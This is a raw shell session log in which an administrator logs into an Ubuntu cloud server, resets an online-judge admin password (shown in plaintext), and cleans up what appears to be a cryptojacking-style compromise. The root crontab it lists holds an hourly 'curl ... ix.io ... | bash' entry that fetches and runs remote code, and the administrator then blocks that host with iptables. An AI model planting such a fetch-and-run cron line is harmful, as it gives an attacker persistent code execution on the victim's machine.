Windows PowerShell
版权所有 (C) Microsoft Corporation。保留所有权利。
尝试新的跨平台 PowerShell https://aka.ms/pscore6
PS C:\Users\yangy> ssh [email protected] -p9999
Password:
Password:
PS C:\Users\yangy> ssh [email protected] -p9999
Password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.
https://ubuntu.com/kubernetes/docs/release-notes
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
7 packages can be updated.
6 updates are security updates.
*** System restart required ***
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Welcome to Huawei Cloud Service
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Oct 21 11:31:18 2019 from 59.78.171.116
Welcome to Huawei Cloud Service
Could not chdir to home directory /home/yiweiyang: No such file or directory
$
$
$
$ ls
bin data etc initrd.img lib lost+found mnt patch root sbin srv tmp var vmlinuz.old
boot dev home initrd.img.old lib64 media opt proc run snap sys usr vmlinuz www
$ docker ps
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2F var%2Frun%2Fdocker.sock/v1.40/containers/json: dial unix /var/run/docker.sock: connect: permission denied
$ su -
Password:
[email protected]:~# ls
f2f_migrate_error.log frp OnlineJudgeDeploy package.xml SISTOJ.git SMS-Agent.tar.gz
f2f_migrate_schedule.log nps package-lock.json SISTOJ SMS-Agent X7QZNkji
[email protected]:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
62658fd3b3c8 registry.cn-hangzhou.aliyuncs.com/onlinejudge/oj_backend "/bin/sh -c /app/dep…" 2 months ago Up 8 days (healthy) 0.0.0.0:4981->1443/tcp, 0.0.0.0:4980->8000/tcp oj-backend
650fa2b219a4 centos "/bin/bash" 2 months ago Up 8 days centos
6ba068b154be registry.cn-hangzhou.aliyuncs.com/onlinejudge/judge_server "/bin/sh -c /code/en…" 2 months ago Up 8 days (healthy) 8080/tcp judge-server
b090c523f1ab postgres:10-alpine "docker-entrypoint.s…" 2 months ago Up 8 days 5432/tcp oj-postgres
659d477410e3 redis:4.0-alpine "docker-entrypoint.s…" 2 months ago Up 8 days 6379/tcp oj-redis
[email protected]:~# docker exec -it oj-backend /bin/sh
/app #
/app #
/app # python3 manage.py inituser --username victoryang00 --password victor129 --action=reset
Django VERSION (2, 1, 7, 'final', 0)
User victoryang00 doesnot exist, operation ignored
/app # python3 manage.py inituser --username root --password victor129 --action=reset
Django VERSION (2, 1, 7, 'final', 0)
Password is rested
/app # [email protected]:~# htop
[email protected]:~# kill 21790
[email protected]:~# htop
[email protected]:~# htop
[email protected]:~# crontab -l
0 * * * * curl -s -L http://ix.io/1K8E | bash -s
[email protected]:~# crontab -e
crontab: installing new crontab
[email protected]:~# more .bash_history
more: stat of .bash_history failed: No such file or directory
[email protected]:~# ll
total 44852
drwx------ 19 root root 4096 Oct 27 15:00 ./
drwxr-xr-x 26 root root 4096 Oct 21 10:42 ../
drwx------ 5 root root 4096 Sep 14 14:10 .acme.sh/
-rw-r--r-- 1 root root 3137 Sep 14 14:10 .bashrc
drwx------ 5 root root 4096 Sep 22 04:28 .cache/
drwxr-xr-x 3 root root 4096 Sep 14 14:29 .cmake/
drwx------ 5 root root 4096 Sep 21 23:11 .config/
-rw-r--r-- 1 root root 465 Sep 14 03:07 f2f_migrate_error.log
-rw-r--r-- 1 root root 435 Sep 13 18:36 f2f_migrate_schedule.log
drwxrwxr-x 3 www www 4096 Jul 17 04:41 frp/
drwx------ 3 root root 4096 Aug 6 18:17 .gnupg/
drwxr-xr-x 3 root root 4096 Sep 21 23:11 .local/
-rw------- 1 root root 428 Sep 22 12:24 .mysql_history
drwxr-xr-x 2 root root 4096 Aug 20 02:19 .nano/
drwxr-xr-x 3 root root 4096 Aug 23 03:25 .node-gyp/
-rw------- 1 root root 0 Sep 22 09:18 .node_repl_history
drwxr-xr-x 5 root root 4096 Aug 6 21:27 .npm/
drwxr-xr-x 4 root root 4096 Aug 13 07:02 nps/
drwxr-xr-x 6 root root 4096 Sep 14 13:43 OnlineJudgeDeploy/
-rw-r--r-- 1 root root 27 Aug 6 21:42 package-lock.json
-rw-r--r-- 1 www uucp 35323 Jul 29 23:14 package.xml
-rw-r--r-- 1 root root 195 Sep 14 15:32 .pearrc
drwxr-xr-x 2 root root 4096 Sep 14 14:08 .pip/
-rw-r--r-- 1 root root 174 Sep 13 2017 .profile
-rw-rw-rw- 1 root root 6 Oct 27 15:00 .pysocks.pid
-rw------- 1 root root 74 Oct 10 13:59 .python_history
-rw-r--r-- 1 root root 66 Oct 21 10:11 .selected_editor
drwxr-xr-x 10 root root 4096 Aug 23 04:17 SISTOJ/
-rw-r--r-- 1 root root 90584 Aug 23 02:14 SISTOJ.git
drwxr-xr-x 8 root root 4096 Sep 13 18:05 SMS-Agent/
-rw-r--r-- 1 root root 45638842 Sep 11 09:28 SMS-Agent.tar.gz
drwx------ 2 root root 4096 Oct 21 10:31 .ssh/
-rw-r--r-- 1 root root 0 Oct 13 06:28 .sudo_as_admin_successful
-rw------- 1 root root 10100 Oct 21 10:44 .viminfo
drwxr-xr-x 5 root root 4096 Sep 21 21:12 .vscode-server/
-rw-r--r-- 1 root root 317 Oct 27 09:00 .wget-hsts
-rwxrwxrwx 1 root root 16940 Oct 27 15:00 X7QZNkji*
[email protected]:~# ls |grep bash
[email protected]:~# cat .
./ .gnupg/ .pearrc .sudo_as_admin_successful
../ .local/ .pip/ .viminfo
.acme.sh/ .mysql_history .profile .vscode-server/
.bashrc .nano/ .pysocks.pid .wget-hsts
.cache/ .node-gyp/ .python_history
.cmake/ .node_repl_history .selected_editor
.config/ .npm/ .ssh/
[email protected]:~# cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to [email protected]:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
# . /etc/bash_completion
#fi
. "/root/.acme.sh/acme.sh.env"
[email protected]:~# cd /etc/init
init/ init.d/ initramfs-tools/
[email protected]:~# cd /etc/init.d/
[email protected]:/etc/init.d# ls
acpid cryptdisks mountall-bootclean.sh ondemand redis ufw
apparmor cryptdisks-early mountall.sh open-iscsi resolvconf umountfs
arp-bind dbus mountdevsubfs.sh open-vm-tools rsync umountnfs.sh
atd docker mountkernfs.sh php-fpm-72 rsyslog umountroot
bootmisc.sh grub-common mountnfs-bootclean.sh plymouth screen-cleanup unattended-upgrades bt halt mountnfs.sh plymouth-log sendmail urandom
checkfs.sh hostname.sh mysql procps sendsigs uuidd
checkroot-bootclean.sh hwclock.sh mysqld pure-ftpd single x11-common
checkroot.sh irqbalance networking rc skeleton
cloudGuardd iscsid nginx rc.local ssh
cloudSafed keyboard-setup.sh nscd rcS sysstat
console-setup.sh killprocs ntp README thermald
cron kmod ntp.dpkg-old reboot udev
[email protected]:/etc/init.d# cat d
dbus docker
[email protected]:/etc/init.d# cat d
dbus docker
[email protected]:/etc/init.d# locat
Command 'locat' not found, did you mean:
command 'socat' from deb socat
command 'ocat' from deb onioncat
command 'locate' from deb mlocate
command 'locate' from deb locate
command 'lzcat' from deb lzma
command 'lolcat' from deb lolcat
Try: apt install <deb name>
[email protected]:/etc/init.d# locate
locate: no pattern to search for specified
[email protected]:/etc/init.d# locate Db
/usr/share/perl5/Debconf/Db.pm
/usr/share/perl5/Debconf/DbDriver
/usr/share/perl5/Debconf/DbDriver.pm
/usr/share/perl5/Debconf/DbDriver/Backup.pm
/usr/share/perl5/Debconf/DbDriver/Cache.pm
/usr/share/perl5/Debconf/DbDriver/Copy.pm
/usr/share/perl5/Debconf/DbDriver/Debug.pm
/usr/share/perl5/Debconf/DbDriver/DirTree.pm
/usr/share/perl5/Debconf/DbDriver/Directory.pm
/usr/share/perl5/Debconf/DbDriver/File.pm
/usr/share/perl5/Debconf/DbDriver/LDAP.pm
/usr/share/perl5/Debconf/DbDriver/PackageDir.pm
/usr/share/perl5/Debconf/DbDriver/Pipe.pm
/usr/share/perl5/Debconf/DbDriver/Stack.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D b.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Backup.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Cache.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Copy.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Debug.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/DirTree.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Directory.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/File.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/LDAP.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/PackageDir.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Pipe.pm
/var/lib/docker/overlay2/51b3a0166a77ff81f6bb030a6a3b0dc660061fc6ba2e86765d6ec69cf38f79c5/diff/usr/share/perl5/Debconf/D bDriver/Stack.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /Db.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Backup.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Cache.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Copy.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Debug.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/DirTree.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Directory.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/File.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/LDAP.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/PackageDir.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Pipe.pm
/var/lib/docker/overlay2/a8a5ed0de41800754bc201f9e1d52810e116cd279e8fe401ff49c3ea8a8ad6aa/merged/usr/share/perl5/Debconf /DbDriver/Stack.pm
/www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/libraries/DbList.php
/www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/libraries/DbQbe.php
/www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/libraries/DbSearch.php
/www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/vendor/phpmyadmin/sql-parser/src/Contexts/ContextMariaDb100000.php
/www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/vendor/phpmyadmin/sql-parser/src/Contexts/ContextMariaDb100100.php /www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/vendor/phpmyadmin/sql-parser/src/Contexts/ContextMariaDb100200.php /www/server/phpmyadmin/phpmyadmin_2b69ca73d647eac1/vendor/phpmyadmin/sql-parser/src/Contexts/ContextMariaDb100300.php /www/wwwroot/openwrt.victoryang00.xyz/vendor/doctrine/dbal/lib/Doctrine/DBAL/Platforms/MariaDb1027Platform.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/doctrine/dbal/lib/Doctrine/DBAL/Platforms/Keywords/MariaDb102Keywords.php /www/wwwroot/openwrt.victoryang00.xyz/vendor/facade/ignition/src/SolutionProviders/DefaultDbNameSolutionProvider.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/facade/ignition/src/SolutionProviders/IncorrectValetDbCredentialsSolutionPr ovider.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/facade/ignition/src/Solutions/SuggestUsingCorrectDbNameSolution.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/facade/ignition/src/Solutions/UseDefaultValetDbCredentialsSolution.php /www/wwwroot/openwrt.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Cache/DynamoDbLock.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Cache/DynamoDbStore.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Queue/Failed/DynamoDbFailedJobProvider.php /www/wwwroot/openwrt.victoryang00.xyz/vendor/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/spatie/db-dumper/src/DbDumper.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/spatie/db-dumper/src/Databases/MongoDb.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/spatie/laravel-backup/src/Exceptions/CannotCreateDbDumper.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/spatie/laravel-backup/src/Tasks/Backup/DbDumperFactory.php
/www/wwwroot/openwrt.victoryang00.xyz/vendor/symfony/http-foundation/Session/Storage/Handler/MongoDbSessionHandler.php /www/wwwroot/openwrt.victoryang00.xyz/vendor/symfony/http-foundation/Tests/Session/Storage/Handler/MongoDbSessionHandler Test.php
/www/wwwroot/www.victoryang00.xyz/vendor/doctrine/dbal/lib/Doctrine/DBAL/Platforms/MariaDb1027Platform.php
/www/wwwroot/www.victoryang00.xyz/vendor/doctrine/dbal/lib/Doctrine/DBAL/Platforms/Keywords/MariaDb102Keywords.php
/www/wwwroot/www.victoryang00.xyz/vendor/facade/ignition/src/SolutionProviders/DefaultDbNameSolutionProvider.php /www/wwwroot/www.victoryang00.xyz/vendor/facade/ignition/src/SolutionProviders/IncorrectValetDbCredentialsSolutionProvid er.php
/www/wwwroot/www.victoryang00.xyz/vendor/facade/ignition/src/Solutions/SuggestUsingCorrectDbNameSolution.php
/www/wwwroot/www.victoryang00.xyz/vendor/facade/ignition/src/Solutions/UseDefaultValetDbCredentialsSolution.php
/www/wwwroot/www.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Cache/DynamoDbLock.php
/www/wwwroot/www.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Cache/DynamoDbStore.php
/www/wwwroot/www.victoryang00.xyz/vendor/laravel/framework/src/Illuminate/Queue/Failed/DynamoDbFailedJobProvider.php
/www/wwwroot/www.victoryang00.xyz/vendor/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php
/www/wwwroot/www.victoryang00.xyz/vendor/spatie/db-dumper/src/DbDumper.php
/www/wwwroot/www.victoryang00.xyz/vendor/spatie/db-dumper/src/Databases/MongoDb.php
/www/wwwroot/www.victoryang00.xyz/vendor/spatie/laravel-backup/src/Exceptions/CannotCreateDbDumper.php
/www/wwwroot/www.victoryang00.xyz/vendor/spatie/laravel-backup/src/Tasks/Backup/DbDumperFactory.php
/www/wwwroot/www.victoryang00.xyz/vendor/symfony/http-foundation/Session/Storage/Handler/MongoDbSessionHandler.php
/www/wwwroot/www.victoryang00.xyz/vendor/symfony/http-foundation/Tests/Session/Storage/Handler/MongoDbSessionHandlerTest .php
[email protected]:/etc/init.d# locate DbSecurity
[email protected]:/etc/init.d# cd ..
[email protected]:/etc# ls
acpi environment libnl-3 pam.conf sgml
adduser.conf fonts libpaper.d pam.d shadow
aliases fstab lighttpd papersize shadow-
alternatives fstab.bak locale.alias passwd shells
apache2 fuse.conf locale.gen passwd- skel
apm gai.conf localtime perl s-nail.rc
apparmor ghostscript logcheck pki sos.conf
apparmor.d groff login.defs pm ssh
apt group logrotate.conf polkit-1 ssl
at.deny group- logrotate.d popularity-contest.conf subgid
bash.bashrc grub.d lsb-release ppp subgid-
bash_completion gshadow ltrace.conf profile subuid
bash_completion.d gshadow- machine-id profile.d subuid-
bindresvport.blacklist gss magic protocols sudoers
binfmt.d hdparm.conf magic.mime python sudoers.d
bt_lib.lock host.conf mail python2.7 sysctl.conf
byobu hostname mailcap python3 sysctl.conf.dpkg-old ca-certificates hosts mailcap.order python3.5 sysctl.d
ca-certificates.conf hosts.allow manpath.config python3.6 sysstat
ca-certificates.conf.dpkg-old hosts.deny mime.types rc0.d systemd
calendar ImageMagick-6 mke2fs.conf rc1.d terminfo
console-setup init modprobe.d rc2.d thermald
containerd init.d modules rc3.d timezone
cron.d initramfs-tools modules-load.d rc4.d tmpfiles.d
cron.daily inputrc motd rc5.d ucf.conf
cron.hourly insserv mtab rc6.d udev
cron.monthly insserv.conf my.cnf rc.local ufw
crontab insserv.conf.d mysql rcS.d updatedb.conf
cron.weekly iproute2 nanorc resolvconf update-manager
cryptsetup-initramfs iscsi netplan resolv.conf update-motd.d
crypttab issue network rmt update-notifier
dbus-1 issue.net NetworkManager rpc vim
debconf.conf kernel networks rsyslog.conf vmware-tools
debian_version kernel-img.conf newt rsyslog.d vtrgb
default ldap nscd.conf screenrc wgetrc
deluser.conf ld.so.cache nsswitch.conf securetty X11
depmod.d ld.so.conf ntp.conf security xdg
dhcp ld.so.conf.d ntp.conf.dpkg-old selinux xml
docker legal opt sensors3.conf zlibc.conf
dpkg letsencrypt os-release sensors.d zmap
emacs libaudit.conf overlayroot.conf services zsh_command_not_found [email protected]:/etc# cd r
rc0.d/ rc2.d/ rc4.d/ rc6.d/ resolvconf/
rc1.d/ rc3.d/ rc5.d/ rcS.d/ rsyslog.d/
[email protected]:/etc# cd rc1.d/
[email protected]:/etc/rc1.d# ld
ld: no input files
[email protected]:/etc/rc1.d# ls
K01bt K01redis K02docker K02nscd K02open-vm-tools K02thermald K03iscsid S02killprocs
K01nginx K02arp-bind K02irqbalance K02ntp K02php-fpm-72 K02ufw K05rsyslog S05single
K01pure-ftpd K02atd K02mysql K02open-iscsi K02sendmail K02uuidd README
[email protected]:/etc/rc1.d# firewa;;-cmd --list-ports
-su: syntax error near unexpected token `;;'
[email protected]:/etc/rc1.d# firewall-cmd --list-ports
Command 'firewall-cmd' not found, but can be installed with:
apt install firewalld
[email protected]:/etc/rc1.d# apt install firewalld
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package firewalld
[email protected]:/etc/rc1.d# ping https://lannis.cn/
ping: https://lannis.cn/: Name or service not known
[email protected]:/etc/rc1.d# ping lannis.cn
PING lannis.cn (139.159.232.87) 56(84) bytes of data.
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=1 ttl=54 time=2.45 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=2 ttl=54 time=2.12 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=3 ttl=54 time=2.08 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=4 ttl=54 time=2.04 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=5 ttl=54 time=2.19 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=6 ttl=54 time=2.15 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=7 ttl=54 time=2.11 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=8 ttl=54 time=2.09 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=9 ttl=54 time=2.11 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=10 ttl=54 time=2.15 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=11 ttl=54 time=2.11 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=12 ttl=54 time=2.11 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=13 ttl=54 time=2.13 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=14 ttl=54 time=2.09 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=15 ttl=54 time=2.12 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=16 ttl=54 time=2.15 ms
64 bytes from ecs-139-159-232-87.compute.hwclouds-dns.com (139.159.232.87): icmp_seq=17 ttl=54 time=2.08 ms
^C
--- lannis.cn ping statistics ---
17 packets transmitted, 17 received, 0% packet loss, time 16017ms
rtt min/avg/max/mdev = 2.048/2.138/2.450/0.103 ms
[email protected]:/etc/rc1.d# htop
[email protected]:/etc/rc1.d# cat /etc/
Display all 206 possibilities? (y or n)
[email protected]:/etc/rc1.d# cat /etc/h
hdparm.conf host.conf hostname hosts hosts.allow hosts.deny
[email protected]:/etc/rc1.d# cat /etc/h
hdparm.conf host.conf hostname hosts hosts.allow hosts.deny
[email protected]:/etc/rc1.d# cat /etc/hosts
hosts hosts.allow hosts.deny
[email protected]:/etc/rc1.d# cat /etc/hosts.deny
[email protected]:/etc/rc1.d# cat /etc/hosts.allow
[email protected]:/etc/rc1.d# cat /etc/hosts.deny
[email protected]:/etc/rc1.d# nano /etc/hosts.deny
[email protected]:/etc/rc1.d# iptables -I INPUT -s http://ix.io/1K8E -j DROP
iptables v1.6.1: invalid mask `1K8E' specified
Try `iptables -h' or 'iptables --help' for more information.
[email protected]:/etc/rc1.d# iptables -I INPUT -s http://ix.io/ -j DROP
iptables v1.6.1: invalid mask `' specified
Try `iptables -h' or 'iptables --help' for more information.
[email protected]:/etc/rc1.d# iptables -I INPUT -s ix.io -j DROP
[email protected]:/etc/rc1.d# -I OUTPUT -p tcp -m string --string "ix.io" --algo bm -j DROP
-I: command not found
[email protected]:/etc/rc1.d# iptables -I OUTPUT -p tcp -m string --string "ix.io" --algo bm -j DROP
ro[email protected]:/etc/rc1.d# htop
[email protected]:/etc/rc1.d# C